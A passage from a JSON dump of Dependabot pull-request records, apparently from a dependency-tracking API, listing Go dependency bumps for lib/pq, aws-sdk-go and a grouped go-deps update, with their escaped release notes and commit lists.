\u0026quot;blob\u0026quot;, \u0026quot;nothing\u0026quot;))\r\n\u003cp\u003e// Replacement\ntx.Prepare(\u003ccode\u003ecopy temp (num, text, blob, nothing) from stdin\u003c/code\u003e)\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eSupport protocol 3.2, and the \u003ccode\u003emin_protocol_version\u003c/code\u003e and \u003ccode\u003emax_protocol_version\u003c/code\u003e DSN parameters (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1258\"\u003e#1258\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003esslmode=prefer\u003c/code\u003e and \u003ccode\u003esslmode=allow\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1270\"\u003e#1270\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003essl_min_protocol_version\u003c/code\u003e and \u003ccode\u003essl_max_protocol_version\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1277\"\u003e#1277\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport connection service file to load connection details (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1285\"\u003e#1285\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003esslrootcert=system\u003c/code\u003e and use \u003ccode\u003e~/.postgresql/root.crt\u003c/code\u003e as the default value of sslrootcert (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1280\"\u003e#1280\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/lib/pq/issues/1281\"\u003e#1281\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd a new \u003ccode\u003epqerror\u003c/code\u003e package with PostgreSQL error codes (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1275\"\u003e#1275\u003c/a\u003e).\u003c/p\u003e\n\u003cp\u003eFor example, to test if an error is a UNIQUE constraint violation:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003eif pqErr, ok := errors.AsType[*pq.Error](https://github.com/lib/pq/blob/HEAD/err); ok \u0026amp;\u0026amp; pqErr.Code == pqerror.UniqueViolation {\r\n    log.Fatalf(\u0026quot;email %q already exsts\u0026quot;, email)\r\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eTo make this a bit more convenient, it also adds a \u003ccode\u003epq.As()\u003c/code\u003e function:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003epqErr := pq.As(err, pqerror.UniqueViolation)\r\nif pqErr != nil {\r\n    log.Fatalf(\u0026quot;email %q already exsts\u0026quot;, email)\r\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix SSL key permission check to allow modes stricter than 0600/0640 (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1265\"\u003e#1265\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lib/pq/blob/master/CHANGELOG.md\"\u003egithub.com/lib/pq's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.12.1 (2026-03-30)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eLook for pgpass file in ~/.pgpass instead of ~/.postgresql/pgpass (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDon't clear password if directly set on pq.Config (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1300\"\u003elib/pq#1300\u003c/a\u003e\n\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1302\"\u003elib/pq#1302\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.0 (2026-03-18)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eThe next release may change the default sslmode from \u003ccode\u003erequire\u003c/code\u003e to \u003ccode\u003eprefer\u003c/code\u003e.\nSee \u003ca href=\"https://redirect.github.com/lib/pq/issues/1271\"\u003e#1271\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eCopyIn()\u003c/code\u003e and \u003ccode\u003eCopyInToSchema()\u003c/code\u003e have been marked as deprecated. These are\nsimple query builders and not needed for \u003ccode\u003eCOPY [..] FROM STDIN\u003c/code\u003e support (which\nis \u003cem\u003enot\u003c/em\u003e deprecated). (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1279\"\u003e#1279\u003c/a\u003e)\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e// Old\ntx.Prepare(CopyIn(\u0026quot;temp\u0026quot;, \u0026quot;num\u0026quot;, \u0026quot;text\u0026quot;, \u0026quot;blob\u0026quot;, \u0026quot;nothing\u0026quot;))\n\u003cp\u003e// Replacement\ntx.Prepare(\u003ccode\u003ecopy temp (num, text, blob, nothing) from stdin\u003c/code\u003e)\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eSupport protocol 3.2, and the \u003ccode\u003emin_protocol_version\u003c/code\u003e and\n\u003ccode\u003emax_protocol_version\u003c/code\u003e DSN parameters (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1258\"\u003e#1258\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003esslmode=prefer\u003c/code\u003e and \u003ccode\u003esslmode=allow\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1270\"\u003e#1270\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003essl_min_protocol_version\u003c/code\u003e and \u003ccode\u003essl_max_protocol_version\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1277\"\u003e#1277\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport connection service file to load connection details (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1285\"\u003e#1285\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003esslrootcert=system\u003c/code\u003e and use \u003ccode\u003e~/.postgresql/root.crt\u003c/code\u003e as the default\nvalue of sslrootcert (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1280\"\u003e#1280\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/lib/pq/issues/1281\"\u003e#1281\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd a new \u003ccode\u003epqerror\u003c/code\u003e package with PostgreSQL error codes (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1275\"\u003e#1275\u003c/a\u003e).\u003c/p\u003e\n\u003cp\u003eFor example, to test if an error is a UNIQUE constraint violation:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003eif pqErr, ok := errors.AsType[*pq.Error](https://github.com/lib/pq/blob/master/err); ok \u0026amp;\u0026amp; pqErr.Code == pqerror.UniqueViolation {\n    log.Fatalf(\u0026quot;email %q already exsts\u0026quot;, email)\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eTo make this a bit more convenient, it also adds a \u003ccode\u003epq.As()\u003c/code\u003e function:\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lib/pq/commit/1464d694fb07af969eb29f60a54f2a90aacdd621\"\u003e\u003ccode\u003e1464d69\u003c/code\u003e\u003c/a\u003e Release v1.12.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lib/pq/commit/5a64c116462db2c585ac7b13c7fb41fcacec91bd\"\u003e\u003ccode\u003e5a64c11\u003c/code\u003e\u003c/a\u003e Fix fromDSN() doc comment\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lib/pq/commit/7f79f1b81ef30630aa9dcacca516997b0f6f6891\"\u003e\u003ccode\u003e7f79f1b\u003c/code\u003e\u003c/a\u003e Fix trailing quote in fromDSN() error message\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lib/pq/commit/e0a292e195790d04df3b4aa...\n\n_Description has been truncated_","html_url":"https://github.com/TheThingsNetwork/lorawan-stack/pull/7873","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheThingsNetwork%2Florawan-stack/issues/7873","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/7873/packages"},{"uuid":"4133054024","node_id":"PR_kwDORwJmf87NPaAM","number":19,"state":"open","title":"Chore(deps): Bump github.com/aws/aws-sdk-go from 1.55.5 to 1.55.8 in /pkg/build","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-03-25T06:50:21.000Z","updated_at":"2026-03-25T06:50:24.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Chore(deps): Bump","packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.5","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"}],"path":"/pkg/build","ecosystem":"go"},"body":"Bumps [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) from 1.55.5 to 1.55.8.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.5...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=github.com/aws/aws-sdk-go\u0026package-manager=go_modules\u0026previous-version=1.55.5\u0026new-version=1.55.8)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/harmoni-code-review-benchmark-org/grafana__grafana__harmoni-engineer__PR97529__20260325/pull/19","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/harmoni-code-review-benchmark-org%2Fgrafana__grafana__harmoni-engineer__PR97529__20260325/issues/19","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/19/packages"},{"uuid":"4132889507","node_id":"PR_kwDORwHqJM7NO-p5","number":27,"state":"open","title":"Bump github.com/aws/aws-sdk-go from 1.55.7 to 1.55.8 in /pkg/build","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-03-25T06:16:52.000Z","updated_at":"2026-03-25T06:16:54.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"}],"path":"/pkg/build","ecosystem":"go"},"body":"Bumps [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) from 1.55.7 to 1.55.8.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=github.com/aws/aws-sdk-go\u0026package-manager=go_modules\u0026previous-version=1.55.7\u0026new-version=1.55.8)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/harmoni-code-review-benchmark-org/grafana__grafana__harmoni-engineer__PR106778__20260324/pull/27","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/harmoni-code-review-benchmark-org%2Fgrafana__grafana__harmoni-engineer__PR106778__20260324/issues/27","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/27/packages"}],"issue_packages":[{"old_version":"1.55.6","new_version":"1.55.8","update_type":"patch","path":null,"pr_created_at":"2026-05-19T06:20:39.000Z","version_change":"1.55.6 → 1.55.8","issue":{"uuid":"4474917987","node_id":"PR_kwDOOYn_TM7c8SIj","number":80,"state":"closed","title":"chore(deps): bump the go-deps group across 1 directory with 47 updates","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-20T03:53:49.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-19T06:20:39.000Z","updated_at":"2026-05-20T03:53:51.000Z","time_to_close":77590,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"go-deps","update_count":47,"packages":[{"name":"cloud.google.com/go/bigquery","old_version":"1.67.0","new_version":"1.77.0","repository_url":"https://github.com/googleapis/google-cloud-go"},{"name":"github.com/allisson/go-pglock/v3","old_version":"3.0.0","new_version":"3.2.0","repository_url":"https://github.com/allisson/go-pglock"},{"name":"github.com/apache/pulsar-client-go","old_version":"0.14.0","new_version":"0.19.0","repository_url":"https://github.com/apache/pulsar-client-go"},{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.6","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/bufbuild/httplb","old_version":"0.3.1","new_version":"0.4.1","repository_url":"https://github.com/bufbuild/httplb"},{"name":"github.com/confluentinc/confluent-kafka-go/v2","old_version":"2.8.0","new_version":"2.14.1","repository_url":"https://github.com/confluentinc/confluent-kafka-go"},{"name":"github.com/databricks/databricks-sql-go","old_version":"1.7.0","new_version":"1.11.0","repository_url":"https://github.com/databricks/databricks-sql-go"},{"name":"github.com/dgraph-io/badger/v4","old_version":"4.7.0","new_version":"4.9.1","repository_url":"https://github.com/dgraph-io/badger"},{"name":"github.com/dlclark/regexp2","old_version":"1.11.5","new_version":"1.12.0","repository_url":"https://github.com/dlclark/regexp2"},{"name":"github.com/docker/docker","old_version":"28.0.4+incompatible","new_version":"28.5.2+incompatible","repository_url":"https://github.com/docker/docker"},{"name":"github.com/go-chi/chi/v5","old_version":"5.2.1","new_version":"5.2.5","repository_url":"https://github.com/go-chi/chi"},{"name":"github.com/golang-migrate/migrate/v4","old_version":"4.18.2","new_version":"4.19.1","repository_url":"https://github.com/golang-migrate/migrate"},{"name":"github.com/gomodule/redigo","old_version":"1.9.2","new_version":"1.9.3","repository_url":"https://github.com/gomodule/redigo"},{"name":"github.com/hashicorp/go-retryablehttp","old_version":"0.7.7","new_version":"0.7.8","repository_url":"https://github.com/hashicorp/go-retryablehttp"},{"name":"github.com/k3a/html2text","old_version":"1.2.1","new_version":"1.4.0","repository_url":"https://github.com/k3a/html2text"},{"name":"github.com/lib/pq","old_version":"1.10.9","new_version":"1.12.3","repository_url":"https://github.com/lib/pq"},{"name":"github.com/linkedin/goavro/v2","old_version":"2.13.1","new_version":"2.15.0","repository_url":"https://github.com/linkedin/goavro"},{"name":"github.com/minio/minio-go/v7","old_version":"7.0.90","new_version":"7.1.0","repository_url":"https://github.com/minio/minio-go"},{"name":"github.com/onsi/ginkgo/v2","old_version":"2.23.4","new_version":"2.29.0","repository_url":"https://github.com/onsi/ginkgo"},{"name":"github.com/redis/go-redis/v9","old_version":"9.7.3","new_version":"9.19.0","repository_url":"https://github.com/redis/go-redis"},{"name":"github.com/rudderlabs/rudder-go-kit","old_version":"0.48.2","new_version":"0.76.0","repository_url":"https://github.com/rudderlabs/rudder-go-kit"},{"name":"github.com/rudderlabs/sqlconnect-go","old_version":"1.20.0","new_version":"1.25.2","repository_url":"https://github.com/rudderlabs/sqlconnect-go"},{"name":"github.com/tidwall/gjson","old_version":"1.18.0","new_version":"1.19.0","repository_url":"https://github.com/tidwall/gjson"},{"name":"github.com/trinodb/trino-go-client","old_version":"0.323.0","new_version":"0.333.0","repository_url":"https://github.com/trinodb/trino-go-client"},{"name":"github.com/urfave/cli/v2","old_version":"2.27.6","new_version":"2.27.7","repository_url":"https://github.com/urfave/cli"}],"path":null,"ecosystem":"go"},"body":"Bumps the go-deps group with 25 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [cloud.google.com/go/bigquery](https://github.com/googleapis/google-cloud-go) | `1.67.0` | `1.77.0` |\n| [github.com/allisson/go-pglock/v3](https://github.com/allisson/go-pglock) | `3.0.0` | `3.2.0` |\n| [github.com/apache/pulsar-client-go](https://github.com/apache/pulsar-client-go) | `0.14.0` | `0.19.0` |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.6` | `1.55.8` |\n| [github.com/bufbuild/httplb](https://github.com/bufbuild/httplb) | `0.3.1` | `0.4.1` |\n| [github.com/confluentinc/confluent-kafka-go/v2](https://github.com/confluentinc/confluent-kafka-go) | `2.8.0` | `2.14.1` |\n| [github.com/databricks/databricks-sql-go](https://github.com/databricks/databricks-sql-go) | `1.7.0` | `1.11.0` |\n| [github.com/dgraph-io/badger/v4](https://github.com/dgraph-io/badger) | `4.7.0` | `4.9.1` |\n| [github.com/dlclark/regexp2](https://github.com/dlclark/regexp2) | `1.11.5` | `1.12.0` |\n| [github.com/docker/docker](https://github.com/docker/docker) | `28.0.4+incompatible` | `28.5.2+incompatible` |\n| [github.com/go-chi/chi/v5](https://github.com/go-chi/chi) | `5.2.1` | `5.2.5` |\n| [github.com/golang-migrate/migrate/v4](https://github.com/golang-migrate/migrate) | `4.18.2` | `4.19.1` |\n| [github.com/gomodule/redigo](https://github.com/gomodule/redigo) | `1.9.2` | `1.9.3` |\n| [github.com/hashicorp/go-retryablehttp](https://github.com/hashicorp/go-retryablehttp) | `0.7.7` | `0.7.8` |\n| [github.com/k3a/html2text](https://github.com/k3a/html2text) | `1.2.1` | `1.4.0` |\n| [github.com/lib/pq](https://github.com/lib/pq) | `1.10.9` | `1.12.3` |\n| [github.com/linkedin/goavro/v2](https://github.com/linkedin/goavro) | `2.13.1` | `2.15.0` |\n| [github.com/minio/minio-go/v7](https://github.com/minio/minio-go) | `7.0.90` | `7.1.0` |\n| [github.com/onsi/ginkgo/v2](https://github.com/onsi/ginkgo) | `2.23.4` | `2.29.0` |\n| [github.com/redis/go-redis/v9](https://github.com/redis/go-redis) | `9.7.3` | `9.19.0` |\n| [github.com/rudderlabs/rudder-go-kit](https://github.com/rudderlabs/rudder-go-kit) | `0.48.2` | `0.76.0` |\n| [github.com/rudderlabs/sqlconnect-go](https://github.com/rudderlabs/sqlconnect-go) | `1.20.0` | `1.25.2` |\n| [github.com/tidwall/gjson](https://github.com/tidwall/gjson) | `1.18.0` | `1.19.0` |\n| [github.com/trinodb/trino-go-client](https://github.com/trinodb/trino-go-client) | `0.323.0` | `0.333.0` |\n| [github.com/urfave/cli/v2](https://github.com/urfave/cli) | `2.27.6` | `2.27.7` |\n\n\nUpdates `cloud.google.com/go/bigquery` from 1.67.0 to 1.77.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 